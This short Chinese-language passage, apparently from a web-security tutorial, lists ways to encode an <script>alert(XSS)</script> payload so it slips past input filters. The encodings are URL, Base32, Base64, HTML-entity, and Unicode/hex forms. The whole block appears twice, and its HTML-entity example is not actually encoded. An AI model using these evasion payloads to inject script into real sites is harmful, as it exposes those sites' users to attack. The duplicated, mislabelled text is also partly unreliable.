3.XSS蠕虫
对于XSS蠕虫,无非就是在客户端提交的时候绕过过滤和转义,可以在继续在浏览器端执行的js 等代码,这里提供几种加密方式:
原型:<script>alert(XSS)</script>
URL Encode: 大小写(所谓URL编码就是:把所有非字母数字字符都将被替换成百分号(%)后跟两位十六进制数,空格则编码为加号(+))
%3cscript%3ealert('XSS')%3c/script%3e
%3Cscript%3Ealert%28XSS%29%3C/script%3E
Base32 Encode:
hrzwg4tjob2d4ylmmvzhikcyknjsspbponrxe2lqoq7a
Base64 Encode:
PHNjcmlwdD5hbGVydChYU1MpPC9zY3JpcHQ+
HTML Entities Encode:
<script>alert(XSS)</script>
Unicode or Hex绕过(只是列举几个):
' == \u0027
' == \x27
+ == \u002b
+ == \x2b
对于XSS蠕虫,无非就是在客户端提交的时候绕过过滤和转义,可以在继续在浏览器端执行的js 等代码,这里提供几种加密方式:
原型:<script>alert(XSS)</script>
URL Encode: 大小写(所谓URL编码就是:把所有非字母数字字符都将被替换成百分号(%)后跟两位十六进制数,空格则编码为加号(+))
%3cscript%3ealert('XSS')%3c/script%3e
%3Cscript%3Ealert%28XSS%29%3C/script%3E
Base32 Encode:
hrzwg4tjob2d4ylmmvzhikcyknjsspbponrxe2lqoq7a
Base64 Encode:
PHNjcmlwdD5hbGVydChYU1MpPC9zY3JpcHQ+
HTML Entities Encode:
<script>alert(XSS)</script>
Unicode or Hex绕过(只是列举几个):
' == \u0027
' == \x27
+ == \u002b
+ == \x2b